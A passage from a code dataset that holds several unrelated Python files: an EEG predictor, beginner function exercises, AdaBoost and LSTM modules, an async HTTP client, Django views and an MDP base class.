.format(curSubject))\n \n dataFile = \"train\\\\subj{}_series{}_data.csv\"\\\n .format(curSubject, curSeries)\n eventsFile = \"train\\\\subj{}_series{}_events.csv\"\\\n .format(curSubject, curSeries)\n\n cur_train_data = pd.read_csv(dataFile)\n cur_train_events = pd.read_csv(eventsFile)\n\n cur_train_data = formatData(cur_train_data)\n cur_train_events = cur_train_events.drop(['id'], axis=1)\n\n data_frames.append(cur_train_data)\n events_frames.append(cur_train_events)\n\n train_data = pd.concat(data_frames, keys=keyLetters)\n train_events = pd.concat(events_frames, keys=keyLetters)\n\n print(\"Fitting data for subject {}...\"\n .format(curSubject))\n clf = RandomForestClassifier(n_estimators=100)\n clf.fit(train_data, train_events)\n\n predictorLookup[curSubject] = clf\n\n return predictorLookup\n\ndef test(predictorLookup):\n \"\"\"Given the predictors determined for each of the subjects, \n performs predictions and writes output for test data. Return void\n\n Keyword arguments:\n predictorLookup -- dictionary formatted as {subject # : random forest predictor}\n used for performing predictions for each subject\n \"\"\"\n\n for subject in range(NUM_SUBJECTS):\n for test in range(NUM_TESTS):\n curTest = START_TEST + test\n curSubject = subject + OFFSET\n\n print(\"Performing predictions for subject {}...\"\n .format(curSubject))\n testFile = \"test\\\\subj{}_series{}_data.csv\"\\\n .format(curSubject, curTest)\n\n test_data = pd.read_csv(testFile)\n ids = test_data['id']\n test_data = formatData(test_data)\n\n clf = predictorLookup[curSubject]\n test_results = [clf.predict(test).tolist() \\\n for test in test_data.values][0]\n\n writeResults(ids, test_results, curSubject, curTest)\n\ndef writeResults(ids, test_results, subject, test):\n \"\"\"Writes results of the test predictions. Returns void\n\n Keyword arguments:\n ids -- Ids of all the trials\n test_results -- Results from random forest predictions\n subject -- Current subject # being predicted\n test -- Current test #\n \"\"\"\n\n predictions_file = open(\"test\\\\subj{}_series{}_events.csv\"\n .format(subject, test), \"wb\")\n open_file_object = csv.writer(predictions_file)\n\n headers = ['id', 'HandStart', 'FirstDigitTouch', \\\n 'BothStartLoadPhase', 'LiftOff', 'Replace', 'BothReleased']\n open_file_object.writerow(headers)\n open_file_object.writerows(zip(ids, test_results))\n predictions_file.close()\n\ndef main():\n predictorLookup = train()\n test(predictorLookup)\n\nif __name__ == \"__main__\":\n main()","sub_path":"EEGMove/EEGPredict.py","file_name":"EEGPredict.py","file_ext":"py","file_size_in_byte":4579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"546359057","text":"# WARMUP SECTION:\nprint('WARMUP SECTION\\n')\n\n# LESSER OF TWO EVENS:\n# Write a function that returns the lesser of two given numbers if both numbers are even,\n# but returns the greater if one or both numbers are odd\ndef lesser_of_two_evens(a,b):\n if a%2 == 0 and b%2 == 0:\n return min(a,b)\n else:\n return max(a,b)\nprint('LESSER OF TWO EVENS\\t{}'.format(lesser_of_two_evens(4,56)))\n\n\n# ANIMAL CRACKERS:\n# Write a function takes a two-word string and returns True if both words begin with same letter\ndef animal_crackers(text):\n splited = text.lower().split()\n return splited[0][0] == splited[1][0]\nprint('ANIMAL CRACKERS\\t{}'.format(animal_crackers('Eben Jenkin')))\nprint('ANIMAL CRACKERS\\t{}'.format(animal_crackers('Jennis Joyal')))\n\n\n# MAKES TWENTY:\n# Given two integers, return True if the sum of the integers is 20 or if one of the integers is 20.\n# If not, return False\ndef makes_twenty(n1,n2):\n return n1 == 20 or n2 == 20 or n1+n2 == 20\nprint('MAKES TWENTY\\t{}'.format(makes_twenty(20,34)))\nprint('MAKES TWENTY\\t{}'.format(makes_twenty(12,8)))\nprint('MAKES TWENTY\\t{}'.format(makes_twenty(23,78)))\n\n\n# LEVEL 1 PROBLEMS\nprint('\\nLEVEL 1 PROBLEMS\\n')\n\n# OLD MACDONALD:\n# Write a function that capitalizes the first and fourth letters of a name\ndef old_macdonald(name):\n # first_letter = name[0].upper()\n # fourth_letter = name[3].upper()\n # return first_letter + name[1:3] + fourth_letter + name[4:]\n first_half = name[:3].capitalize()\n second_half = name[3:].capitalize()\n return first_half+second_half\nprint('OLD MACDONALD\\t{}'.format(old_macdonald('sangi')))\n\n\n# MASTER YODA:\n# Given a sentence, return a sentence with the words reversed\ndef master_yoda(text):\n my_list = text.split()\n my_list = my_list[::-1]\n return ' '.join(my_list)\nprint('MASTER YODA\\t{}'.format(master_yoda('I am pree')))\n\n\n# ALMOST THERE:\n# Given an integer n, return True if n is within 10 of either 100 or 200\ndef almost_there(n):\n return abs(100-n) <= 10 or abs(200-n) <= 10 # abs() removes negative sign\nprint('ALMOST THERE\\t{}'.format(almost_there(90)))\n\n\n# LEVEL 2 PROBLEMS\nprint('\\nLEVEL 2 PROBLEMS\\n')\n\n# FIND 33:\n# Given a list of ints, return True if the array contains a 3 next to a 3 somewhere.\ndef has_33(my_list):\n for index,n in enumerate(my_list):\n if n == 3 and my_list[index+1] == 3:\n return True\n else:\n continue\n return False\nprint('FIND 33\\t{}'.format(has_33([1,3,2,3,7])))\n\n\n# PAPER DOLL:\n# Given a string, return a string where for every character in the original there are three characters\ndef paper_doll(str):\n new_str = [letter+letter+letter for letter in str ]\n return ''.join(new_str)\nprint('PAPER DOLL\\t{}'.format(paper_doll('sangi')))\n\n\n# BLACKJACK:\n# Given three integers between 1 and 11, if their sum is less than or equal to 21, return their sum.\n# If their sum exceeds 21 and there's an eleven, reduce the total sum by 10.\n# Finally, if the sum (even after adjustment) exceeds 21, return 'BUST'\ndef blackjack(n1,n2,n3):\n total = n1+n2+n3\n my_tup = (n1,n2,n3)\n total_11 = my_tup.count(11)\n if total <= 21:\n return total\n elif total_11 > 0:\n total = total - (total_11 * 10)\n if total <= 21:\n return total\n else:\n return 'BUST'\n else:\n return 'BUST'\nprint('BLACKJACK\\t{}'.format(blackjack(11,11,2)))\nprint('BLACKJACK\\t{}'.format(blackjack(5,6,7))) # --> 18\nprint('BLACKJACK\\t{}'.format(blackjack(9,9,9))) # --> 'BUST'\nprint('BLACKJACK\\t{}'.format(blackjack(9,9,11))) # --> 19\n\n\n# SUMMER OF '69:\n# Return the sum of the numbers in the array,\n# except ignore sections of numbers starting with a 6 and extending to the next 9\n# (every 6 will be followed by at least one 9). Return 0 for no numbers.\ndef summer_69(my_list):\n if 6 not in my_list:\n return sum(my_list)\n else:\n index_6 = my_list.index(6)\n index_9 = my_list.index(9)\n return sum(my_list[0:index_6]) + sum(my_list[index_9+1:])\nprint('SUMMER OF 69\\t{}'.format(summer_69([1,3,5,6,9,5])))\n\n\n# CHALLENGING PROBLEMS\nprint('\\nCHALLENGING PROBLEMS\\n')\n\n# SPY GAME:\n# Write a function that takes in a list of integers and returns True if it contains 007 in order\ndef spy_game(my_list):\n if 0 in my_list:\n first_index = my_list.index(0)\n if 0 in my_list[first_index+1:]:\n second_index = my_list[first_index+1:].index(0) + first_index\n return 7 in my_list[second_index+1:]\n else:\n return False\n else:\n return False\nprint('SPY GAME\\t{}'.format(spy_game([1,2,4,0,0,7,5]))) # --> True\nprint('SPY GAME\\t{}'.format(spy_game([1,0,2,4,0,5,7]))) # --> True\nprint('SPY GAME\\t{}'.format(spy_game([1,7,2,0,4,5,0]))) # --> False\n\ndef spy_game_sol(my_list):\n code = [0,0,7,'x']\n for num in my_list:\n if num == code[0]:\n code.pop(0)\n return len(code) == 1\nprint('SPY GAME\\t{}'.format(spy_game_sol([1,2,4,0,0,7,5]))) # --> True\nprint('SPY GAME\\t{}'.format(spy_game_sol([1,0,2,4,0,5,7]))) # --> True\nprint('SPY GAME\\t{}'.format(spy_game_sol([1,7,2,0,4,5,0]))) # -->\n\n\n# COUNT PRIMES:\n# Write a function that returns the number of prime numbers that exist up to and including a given number\ndef count_primes(n):\n primes = [2]\n x = 3\n if n < 2:\n return 0\n while x <= n:\n for y in range(3,x,2):\n if(x%y == 0):\n x += 2\n break\n else: # else for for loop. Unique behaviour in python\n x += 2\n primes.append(x)\n return len(primes)\nprint('COUNT PRIMES\\t{}'.format(count_primes(100)))\n\n\n# PRINT BIG:\n# Write a function that takes in a single letter, and returns a 5x5 representation of that letter\n\ndef print_big(letter):\n patterns = {1:' * ',2:' * * ',3:'* *',4:'*****',5:'**** ',6:' * ',7:' * ',8:'* * ',9:'* '}\n alphabet = {'A':[1,2,4,3,3],'B':[5,3,5,3,5],'C':[4,9,9,9,4],'D':[5,3,3,3,5],'E':[4,9,4,9,4]}\n for pattern in alphabet[letter.upper()]:\n print(patterns[pattern])\n\nprint_big('a')","sub_path":"assessment_test/function_practice_exercise.py","file_name":"function_practice_exercise.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"290073777","text":"import math\nimport csv\nimport random\n\n\ndef iterate(matches, sample_weight):\n error = 0\n if sample_weight is None:\n sample_weight = []\n for idx in range(len(matches)):\n sample_weight.append(float(1) / len(matches))\n for idx in range(len(matches)):\n if not matches[idx]:\n error += sample_weight[idx]\n print('error is ' + str(error))\n # if error > 0.5:\n # return True, None, None\n beta = error / (1 - error)\n clf_weight = math.log(1 / beta)\n new_sample_weight = []\n print('updating sample weights...')\n sum = 0\n for idx in range(len(matches)):\n if matches[idx]:\n new_sample_weight.append(sample_weight[idx] * beta)\n sum += sample_weight[idx] * beta\n else:\n new_sample_weight.append(sample_weight[idx])\n sum += sample_weight[idx]\n for idx in range(len(matches)):\n new_sample_weight[idx] /= sum\n print('done')\n return False, clf_weight, new_sample_weight\n\n\ndef merge(id, candid, weight):\n result = []\n print('merging...')\n for i in range(len(candid[0])):\n result.append(0)\n for i in range(len(weight)):\n for j in range(len(result)):\n result[j] += weight[i] * candid[i][j]\n print('done')\n with open('result/' + str(id) + '-weak.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['id', 'label'])\n i = random.randint(0, len(weight) - 1)\n for idx, label in enumerate(candid[i]):\n writer.writerow([idx + 1, 1 if label > 0 else -1 if label < 0 else 0])\n with open('result/' + str(id) + '-standard.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['id', 'label'])\n for idx, label in enumerate(result):\n writer.writerow([idx + 1, 1 if label > 0 else -1 if label < 0 else 0])\n with open('result/' + str(id) + '-strict.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['id', 'label'])\n for idx, label in enumerate(result):\n writer.writerow([idx + 1, 1 if label > 0.05 else -1 if label < -0.05 else 0])\n with open('result/' + str(id) + '-loose.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['id', 'label'])\n for idx, label in enumerate(result):\n writer.writerow([idx + 1, 1 if label > 0.25 else -1 if label < -0.25 else 0])","sub_path":"adaboost-dtree/adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"610974776","text":"import gzip\nimport os\nimport sys\nimport json\nfrom collections import defaultdict\n\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow.python.ops import rnn, rnn_cell\nimport tensorflow.python.platform\n\nclass config:\n batch_size = 128\n num_epochs = 100\n num_hidden = 64\n num_layers = 4\n max_seq_len = 60\n num_features = 40\n num_classes = 2\n\ndef create_batches(input_data):\n \"\"\"\n inputdata = [ {\"class\":0/1, \"sequence\";[]} ]\n output = dict[batch_id] = [ exemplar => (sequence, class, seq len) ]\n \"\"\"\n batchdict = defaultdict(list)\n for i, exemplar in enumerate(input_data):\n batch_id = int(i / config.batch_size)\n batchdict[batch_id].append( exemplar )\n\n return batchdict\n\n\ndef iter_batches(batches):\n for batch in batches.itervalues():\n yield zip(*[split_exemplar(exemplar) for exemplar in batch])\n\n\ndef split_exemplar(exemplar) :\n out_class = exemplar[\"class\"]\n padding = [0] * config.num_features\n raw_series_length = len(exemplar[\"sequence\"])\n input_sequence_length = min(raw_series_length, config.max_seq_len)\n\n input_sequence = [exemplar['sequence'][i] if i < raw_series_length else padding for i in xrange(config.max_seq_len)]\n\n return input_sequence, out_class, input_sequence_length\n\ndef _error_rate(predict_correct):\n \"\"\"Return the error rate given the correctness of each prediction.\"\"\"\n return 100.0 - (100.0 * np.mean(predict_correct))\n\ndef error_rate(predictions, labels):\n \"\"\"Return the error rate based category labels.\"\"\"\n return _error_rate(predictions == labels)\n\ndef error_rate_hots(predictions, labels):\n \"\"\"Return the error rate based on 1-hot representations.\"\"\"\n return _error_rate(np.argmax(predictions, 1) == np.argmax(labels, 1))\n\n\ndef create_graph(base_learning_rate = 0.01):\n \"\"\"\n TF LSTM Graph\n \"\"\"\n # This is where training samples and labels are fed to the graph.\n # These placeholder nodes will be fed a batch of training data at each\n # training step using the {feed_dict} argument to the Run() call below.\n\n #Place holder definition [ batch size , max input sequence length, number of features]\n #\n # batch_size => set to None, to dynamically deal with the final batch not being equal in size\n # max_input_len => of the batch?\n # num_feat => number of features\n\n\ndef last_relevant(output, length):\n\n batch_size = tf.shape(output)[0]\n max_length = tf.shape(output)[1]\n out_size = int(output.get_shape()[2])\n index = tf.range(0, batch_size) * max_length + (length -1)\n flat = tf.reshape(output, [-1, out_size])\n relevant = tf.gather(flat, index)\n\n return relevant\n\nclass LSTMNet(object): pass\n\ndef build_lstm_layers(output_keep_prob):\n\n # First, create a basic LSTM layer that will be reused\n lstm_layer = rnn_cell.BasicLSTMCell(config.num_hidden, state_is_tuple=True)\n\n # Add dropout to this layer, but only during training\n lstm_layer = rnn_cell.DropoutWrapper(lstm_layer, output_keep_prob=output_keep_prob)\n\n # Stack this layer repeatedly to construct a directional LSTM network\n lstm_network = rnn_cell.MultiRNNCell([lstm_layer] * config.num_layers, state_is_tuple=True)\n\n # The variables below hold all the trainable weights. They are passed an\n # initial value which will be assigned when when we call:\n # tf.initialize_all_variables().run()\n weights = tf.Variable(tf.random_normal([config.num_hidden, config.num_classes]))\n biases = tf.Variable(tf.random_normal([config.num_classes]))\n\n return lstm_network, weights, biases\n\n\ndef model(batched_input, sequence_length, output_keep_prob):\n\n forward_network, forward_weights, forward_biases = build_lstm_layers(output_keep_prob)\n backward_network, backward_weights, backward_biases = build_lstm_layers(output_keep_prob)\n\n outputs, state = rnn.bidirectional_dynamic_rnn(\n forward_network,\n backward_network,\n batched_input,\n sequence_length,\n dtype=tf.float32)\n\n # The network processes the entire series -- including the zero padding added to\n # the end of the series to ensure all series are the same length. In this network,\n # we want to pass the last state from both the forward and backward networks to\n # the final layer that integrates the two states. But since the network processes\n # the zero-padded time slices, we can't just take the final states produced by the\n # dynamic RNN above, instead we take the last _meaningful_ state, based on the\n # known sequence length\n forward_all_outputs, backward_all_outputs = outputs\n forward_output = last_relevant(forward_all_outputs, sequence_length)\n backward_output = last_relevant(backward_all_outputs, sequence_length)\n\n return tf.matmul(forward_output, forward_weights) + forward_biases + \\\n tf.matmul(backward_output, backward_weights) + backward_biases\n\n\ndef create_graph(learning_rate = 0.001):\n \"\"\"\n TF Graph that can ve run on mini batches of data\n \"\"\"\n\n # This is where training samples and labels are fed to the graph.\n # These placeholder nodes will be fed a batch of training data at each\n # training step using the {feed_dict} argument to the run() call below.\n\n batched_input = tf.placeholder(tf.float32, [None, config.max_seq_len, config.num_features])\n target_class = tf.placeholder(tf.int32, [None])\n #Binary Classification\n target_output = tf.one_hot(target_class, depth = config.num_classes)\n sequence_length = tf.placeholder(tf.int32, [None])\n output_keep_prob = tf.placeholder(tf.float32)\n\n # Training computation: logits + cross-entropy loss.\n logits = model(batched_input, sequence_length, output_keep_prob)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits, target_output))\n\n # Set up the optimizer\n batch = tf.Variable(0)\n #optimizer = tf.train.MomentumOptimizer(learning_rate, .95).minimize(loss, global_step=batch)\n optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss, global_step=batch)\n\n # Predict the class, or port, associated with the sequence\n prediction = tf.nn.softmax(logits)\n\n # TODO: make this a real class\n graph = LSTMNet()\n graph.batched_input = batched_input\n graph.target_class = target_class\n graph.target_output = target_output\n graph.sequence_length = sequence_length\n graph.output_keep_prob = output_keep_prob\n graph.prediction = prediction\n graph.optimizer = optimizer\n graph.loss = loss\n\n return graph","sub_path":"bl_lstm.py","file_name":"bl_lstm.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"102282675","text":"\"\"\"This module provides a simple Python client to the Krake HTTP API. It\nleverages the same data models as the API server from :mod:`krake.data`.\n\"\"\"\nfrom aiohttp import ClientSession, TCPConnector\nfrom yarl import URL\n\n\nclass Client(object):\n \"\"\"Simple async Python client for the Krake HTTP API.\n\n The specific APIs are implemented in separate classes. Each API object\n requires an :class:`Client` instance to interface the HTTP REST API.\n\n The client implements the asynchronous context manager protocol used to\n handle opening and closing the internal HTTP session.\n\n Example:\n .. code:: python\n\n from krake.client import Client\n from krake.client.core import CoreApi\n\n async with Client(\"http://localhost:8080\") as client:\n core_api = CoreApi(client)\n role = await core_api.read_role(name=\"reader\")\n\n \"\"\"\n\n def __init__(self, url, loop=None, ssl_context=None):\n self.loop = loop\n self.url = URL(url)\n self.session = None\n self.ssl_context = ssl_context\n\n async def __aenter__(self):\n await self.open()\n return self\n\n async def __aexit__(self, *exc):\n await self.close()\n\n async def open(self):\n \"\"\"Open the internal HTTP session and initializes all resource\n attributes.\n \"\"\"\n if self.session is not None:\n return\n\n connector = None\n if self.ssl_context:\n connector = TCPConnector(ssl_context=self.ssl_context)\n\n self.session = ClientSession(\n loop=self.loop, raise_for_status=True, connector=connector\n )\n\n async def close(self):\n \"\"\"Close the internal HTTP session and remove all resource attributes.\"\"\"\n if self.session is None:\n return\n await self.session.close()\n self.session = None\n","sub_path":"krake/krake/client/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"222832400","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom django.urls import reverse_lazy\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import ListView, CreateView, DeleteView, UpdateView\n\nfrom apps.baliza.models import Area, Piso\nfrom apps.baliza.views.area.forms import AreaForm\n\n\n@method_decorator(login_required(login_url='signin'), name='dispatch')\nclass AreaListView(ListView):\n model = Area\n template_name = 'Ubicacion/AreaListView.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Listado Areas por Piso en Sede'\n context['list_url'] = reverse_lazy('project:form_create_area')\n context['create_url'] = reverse_lazy('project:form_create_area')\n context['entity'] = 'Sedes'\n return context\n\n\n@method_decorator(login_required(login_url='signin'), name='dispatch')\nclass AreaCreateView(CreateView):\n model = Area\n form_class = AreaForm\n template_name = 'FORM.html'\n success_url = reverse_lazy('project:form_readlist_area')\n\n def post(self, request, *args, **kwargs):\n data = dict()\n try:\n action = request.POST['action']\n if action == 'add':\n forms = AreaForm(request.POST)\n if forms.is_valid():\n area_sel = forms.cleaned_data['area']\n xInicial = forms.cleaned_data['xInicial']\n xFinal = forms.cleaned_data['xFinal']\n yInicial = forms.cleaned_data['yInicial']\n yFinal = forms.cleaned_data['yFinal']\n descripcion = forms.cleaned_data['descripcion']\n piso = forms.cleaned_data['piso']\n\n area = Area()\n area.area = area_sel\n area.xInicial = xInicial\n area.xFinal = xFinal\n area.yInicial = yInicial\n area.yFinal = yFinal\n area.descripcion = descripcion\n area.piso = piso\n area.usuarioRegistra = request.user\n area.save()\n data['redirec'] = reverse_lazy('project:form_readlist_area')\n else:\n data['error'] = 'Error en datos, favor intentelo de nuevo'\n else:\n data['error'] = 'No ha ingresado a ninguna opción'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Crear un Area'\n context['action'] = 'add'\n context['entity'] = 'Crear Area'\n if Piso.objects.all().count() == 0:\n context['error'] = 'No hay una Piso creado para ninguna sede, por favor cree uno.'\n return context\n\n\n@method_decorator(login_required(login_url='signin'), name='dispatch')\nclass AreaUpdateView(UpdateView):\n model = Area\n form_class = AreaForm\n template_name = 'FORM.html'\n success_url = reverse_lazy('project:form_readlist_area')\n\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = dict()\n try:\n action = request.POST['action']\n if action == 'edit':\n form = self.get_form()\n data = form.save()\n print(data)\n data['redirec'] = reverse_lazy('project:form_readlist_area')\n else:\n data['error'] = 'No ha ingresado a ninguna opción'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Edición de un Area'\n context['action'] = 'edit'\n context['entity'] = 'Editar Area'\n return context\n\n@method_decorator(login_required(login_url='signin'), name='dispatch')\nclass AreaDeleteView(DeleteView):\n model = Area\n form_class = AreaForm\n template_name = 'DELETE.html'\n success_url = reverse_lazy('project:form_readlist_area')\n\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n self.object.delete()\n data['redirec'] = reverse_lazy('project:form_readlist_area')\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Eliminación de un Area'\n context['entity'] = 'Sedes'\n context['textoMostrar'] = self.object.area\n context['list_url'] = reverse_lazy('project:form_readlist_area')\n return context","sub_path":"ServerDjango/apps/baliza/views/area/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"395115989","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport copy\n\nfrom pyrlap.core.util import sample_prob_dict, SANSRTuple, SANSTuple\nfrom pyrlap.core.transition_function import TransitionFunction\n\nclass MDP(object):\n #=============================================#\n def get_init_state(self):\n raise NotImplementedError\n\n def get_init_state_dist(self):\n raise NotImplementedError\n\n def get_init_states(self):\n return []\n\n def is_terminal(self, s):\n raise NotImplementedError\n\n def is_absorbing(self, s):\n raise NotImplementedError\n\n def is_any_terminal(self, s):\n raise NotImplementedError\n\n def is_terminal_action(self, a):\n raise NotImplementedError\n\n def get_terminal_states(self):\n raise NotImplementedError\n\n def transition_reward_dist(self, s, a):\n raise NotImplementedError\n\n def transition_dist(self, s, a):\n trdist = self.transition_reward_dist(s, a)\n tdist = {}\n for (ns, r), p in trdist.items():\n tdist[ns] = tdist.get(ns, 0) + p\n return tdist\n\n def transition(self, s, a):\n return sample_prob_dict(self.transition_reward_dist(s, a))[0]\n\n def reward(self, s=None, a=None, ns=None):\n raise NotImplementedError\n\n def reward_dist(self, s=None, a=None, ns=None):\n raise NotImplementedError\n\n def available_actions(self, s=None):\n raise NotImplementedError\n\n # =============================================#\n \"\"\"\n There are multiple ways to represent the probability distribution\n P(ns, r | s, a). These are functions designed to let you define\n it in one way and then translate it into the other ways for use in\n different algorithms.\n \"\"\"\n\n def _cond_tfrf_to_joint(self, s=None, a=None):\n \"\"\"\n Requires that transition_dist(s, a) and reward_dist(s, a, ns)\n are defined.\n\n :param s:\n :param a:\n :return:\n \"\"\"\n tdist = self.transition_dist(s, a)\n trdist = {}\n for ns, tp in tdist.items():\n rdist = self.reward_dist(s, a, ns)\n for r, rp in rdist.items():\n trdist[(ns, r)] = tp * rp\n return trdist\n\n # ============================================= #\n\n def get_state_features(self, s):\n raise NotImplementedError\n\n def get_states(self):\n raise NotImplementedError\n\n def get_non_terminal_states(self):\n states = []\n for s in self.get_states():\n if not (\n self.is_absorbing(s) or\n self.is_terminal(s)\n ):\n states.append(s)\n return states\n\n def get_reachable_transition_reward_functions(self,\n max_states=np.inf,\n init_state=None,\n init_states=None):\n if init_states is None:\n init_states = []\n\n if init_state is None:\n init_state = self.get_init_state()\n\n init_states.append(init_state)\n frontier = set(init_states)\n visited = set([])\n tf = {}\n rf = {}\n while len(frontier) > 0 and len(tf) < max_states:\n s = frontier.pop()\n visited.add(s)\n tf[s] = tf.get(s, {})\n rf[s] = rf.get(s, {})\n for a in self.available_actions(s):\n tf[s][a] = tf[s].get(a, {})\n rf[s][a] = rf[s].get(a, {})\n tr_dist = self.transition_reward_dist(s, a)\n for (ns, r), p in tr_dist.items():\n tf[s][a][ns] = tf[s][a].get(ns, 0)\n tf[s][a][ns] += p\n\n rf[s][a][ns] = rf[s][a].get(ns, 0)\n rf[s][a][ns] += r*p\n if ns not in visited:\n frontier.add(ns)\n return (TransitionFunction(tf), rf)\n\n def get_reachable_states(self, max_states=np.inf,\n init_state=None, init_states=None):\n return self.get_reachable_transition_reward_functions(\n max_states, init_state, init_states\n )[0].keys()\n\n def get_state_actions(self):\n raise NotImplementedError\n\n def get_state_action_nextstates(self):\n raise NotImplementedError\n \n def iterate_sans_prob(self):\n for s in self.get_states():\n for a in self.available_actions(s):\n for ns, prob in self.transition_dist(s, a).items():\n yield (s, a, ns, prob)\n\n def get_reward_dict(self):\n raise NotImplementedError\n\n # =============================================#\n def get_optimal_policy(self):\n raise NotImplementedError\n\n def get_softmax_policy(self, temp):\n raise NotImplementedError\n\n # ============================================= #\n\n def plot(self):\n raise NotImplementedError\n\n # =============================================#\n\n def solve(self, discount_rate):\n raise NotImplementedError\n\n def calc_trajectory_return(self, traj, init_state=None, discount=1):\n value = 0\n\n if len(traj[0]) == 1:\n ns = init_state\n \n for tup in traj:\n if len(tup) == 3:\n s, a, ns = tup\n elif len(tup) == 2:\n s, a = tup\n ns = self.transition(s, a)\n elif len(tup) == 1:\n a = tup\n s = ns\n ns = self.transition(s, a)\n value += self.reward(s=s, a=a, ns=ns)*discount\n return value\n\n def gen_transition_dict(self, start_state=None):\n tf, rf = self.get_reachable_transition_reward_functions(\n init_state=start_state\n )\n return tf\n\n def run_policy(self, policy, init_state=None):\n if init_state is None:\n init_state = self.get_init_state()\n traj = []\n s = init_state\n while not self.is_terminal(s):\n a = policy(s)\n ns = self.transition(s, a)\n r = self.reward(s, a, ns)\n traj.append(SANSRTuple(s, a, ns, r))\n s = ns\n return traj\n\n def enumerate_trajs(self, init_states=None, depth=4,\n no_deterministic_loops=True):\n if init_states is None:\n init_states = [self.get_init_state(), ]\n trajs = set([])\n frontier = \\\n set([tuple([SANSTuple(None, None, s),])for s in init_states])\n while len(frontier) > 0:\n pre_traj = list(frontier.pop())\n s = pre_traj[-1].ns\n if pre_traj[-1].s is None:\n pre_traj = []\n for a in self.available_actions(s):\n for ns, tp in self.transition_dist(s, a).items():\n if no_deterministic_loops and ns == s and tp == 1:\n continue\n new_pre_traj = copy.copy(pre_traj)\n new_pre_traj.append(SANSTuple(s, a, ns))\n if self.is_terminal(ns):\n trajs.add(tuple(new_pre_traj))\n elif len(new_pre_traj) == depth:\n trajs.add(tuple(new_pre_traj))\n else:\n frontier.add(tuple(new_pre_traj))\n return list(trajs)\n\n def as_matrices(self):\n aa = self.available_actions()\n aa_i = {a: i for i, a in enumerate(aa)}\n ss = self.get_states()\n ss_i = {s: i for i, s in enumerate(ss)}\n tf = np.zeros((len(ss), len(aa), len(ss)), dtype=np.float32)\n rf = np.zeros((len(ss), len(aa), len(ss)), dtype=np.float32)\n for s in ss:\n for a in aa:\n ns_dist = self.transition_dist(s, a)\n for ns, p in ns_dist.items():\n tf[ss_i[s], aa_i[a], ss_i[ns]] = p\n rf[ss_i[s], aa_i[a], ss_i[ns]] = self.reward(s, a, ns)\n s0 = self.get_init_state_dist()\n s0 = np.array([s0.get(s, 0) for s in ss], dtype=np.float32)\n non_term = set(self.get_non_terminal_states())\n nt_states = np.array([1 if s in non_term else 0 for s in ss])\n return {\n 'tf': tf, 'rf': rf, 's0': s0, 'ss': ss, 'aa': aa,\n 'nt_states': nt_states\n }\n\n def is_valid_transition(self, s, a, ns, *args, **kwargs):\n ns_dist = self.transition_dist(s, a)\n return ns in ns_dist\n\n def is_valid_trajectory(self, traj):\n for step in traj:\n if not self.is_valid_transition(*step):\n return False\n return True","sub_path":"lib/pyrlap/pyrlap/core/mdp/mdp.py","file_name":"mdp.py","file_ext":"py","file_size_in_byte":8614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"572687770","text":"from __future__ import print_function, division\n\nimport copy\nimport logging\n\nimport numpy as np\nfrom scipy.optimize import fmin_l_bfgs_b, fmin_bfgs, fmin\n\nfrom .utils import yxbounds\n\n__all__ = [\"guess_sky\", \"fit_galaxy_single\", \"fit_galaxy_sky_multi\",\n \"fit_position_sky\", \"fit_position_sky_sn_multi\"]\n\n\ndef _check_result(warnflag, msg):\n \"\"\"Check result of fmin_l_bfgs_b()\"\"\"\n if warnflag == 0:\n return\n if warnflag == 1:\n raise RuntimeError(\"too many function calls or iterations \"\n \"in fmin_l_bfgs_b()\")\n if warnflag == 2:\n raise RuntimeError(\"fmin_l_bfgs_b() exited with warnflag=2: %s\" % msg)\n raise RuntimeError(\"unknown warnflag: %s\" % warnflag)\n\n\ndef _check_result_fmin(warnflag):\n \"\"\"Check result of fmin()\"\"\"\n if warnflag == 0:\n return\n if warnflag == 1:\n raise RuntimeError(\"maximum number of function calls reached in fmin\")\n if warnflag == 2:\n raise RuntimeError(\"maximum number of iterations reached in fmin\")\n raise RuntimeError(\"unknown warnflag: %s\" % warnflag)\n\n\ndef _log_result(fn, fval, niter, ncall):\n \"\"\"Write the supplementary results from optimizer to the log\"\"\"\n logging.info(\" success: %3d iterations, %3d calls, val=%8.2f\",\n niter, ncall, fval)\n\n\ndef guess_sky_clipping(cube, 